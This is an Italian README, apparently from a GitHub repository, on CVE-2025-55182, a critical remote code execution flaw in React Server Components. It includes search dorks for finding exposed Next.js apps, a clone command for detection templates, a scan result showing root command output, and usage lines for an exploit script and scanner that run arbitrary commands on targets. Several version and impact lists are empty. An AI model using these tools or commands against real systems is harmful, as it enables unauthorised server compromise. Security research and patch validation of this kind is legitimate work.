
Una vulnerabilità critica di esecuzione remota di codice (Remote Code Execution, RCE) che interessa l'implementazione dei React Server Components (RSC) all'interno di più pacchetti, inclusi.
CVE-2025-55182 è una vulnerabilità critica di Esecuzione di Codice Remota (RCE) che colpisce l'implementazione dei React Server Components (RSC) in molteplici pacchetti, tra cui:
La vulnerabilità è dovuta alla deserializzazione non sicura dei payload inviati tramite il protocollo interno Flight utilizzato da RSC. Quando determinati input non attendibili passano attraverso i React Server Components tramite richieste HTTP, può essere innescata l'esecuzione di codice lato server.
Le versioni interessate includono:
Le versioni corrette includono:
I React Server Components accettano richieste lato client che vengono analizzate e deserializzate sul backend. La vulnerabilità deriva da controlli insufficienti sulla deserializzazione dei dati in ingresso, consentendo a payload appositamente costruiti di essere interpretati come componenti eseguibili lato server.
Quando ciò accade, può verificarsi l'esecuzione di JavaScript arbitrario sul server, che può portare alla compromissione completa del server a seconda dell'ambiente di hosting e dei privilegi.
Se sfruttata, un attaccante potrebbe essere in grado di:
Punteggio CVSS: 10.0 – CRITICO
Verificare se l'applicazione espone React Server Components e se sono in uso versioni interessate.
curl -I https://target.com/?__rsc=1
Queste parole chiave aiutano a identificare se un repository o un'applicazione web pubblica fa riferimento a componenti RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
Destinato esclusivamente all'audit interno del dominio della tua organizzazione.
Verifica l'uso del framework esposto, non lo sfruttamento della vulnerabilità.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Per automatizzare la scansione difensiva, clona la logica di rilevamento basata su template per la valutazione della tua infrastruttura:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Script exploit RCE completo che esegue comandi arbitrari e recupera l'output.
Utilizzo:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Dominio/URL target (obbligatorio)-c, --command - Comando da eseguire (predefinito: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
I template all'interno del repository sono pensati per:
IMPORTANTE: questi template devono essere eseguiti esclusivamente su sistemi di tua proprietà o per i quali sei autorizzato a effettuare valutazioni.
I template Nuclei inclusi in questo repository sono destinati esclusivamente a:
Assicurati di:
Passa a una delle release corrette:
Ricercatore di Sicurezza • Formatore di Cyber Security • Bug Bounty Hunter
Motto: Zero Trust Full Secure 🚀
CVE-2025-55182 è attualmente una delle minacce più critiche per le infrastrutture basate su React. A causa del vettore di sfruttamento banale e della superficie d'attacco non autenticata, è fortemente consigliata l'applicazione immediata della patch. Qualsiasi organizzazione che esegue versioni RSC interessate dovrebbe considerare una priorità di emergenza.
Questo repository e la documentazione sono destinati alla ricerca difensiva e alla validazione della sicurezza degli asset di tua proprietà. Qualsiasi uso improprio può essere illegale. Sei responsabile del rispetto delle leggi e delle policy organizzative.
Fatto con ❤️ da Cyber Leelawat
Zero Trust Full Secure 🎯🔐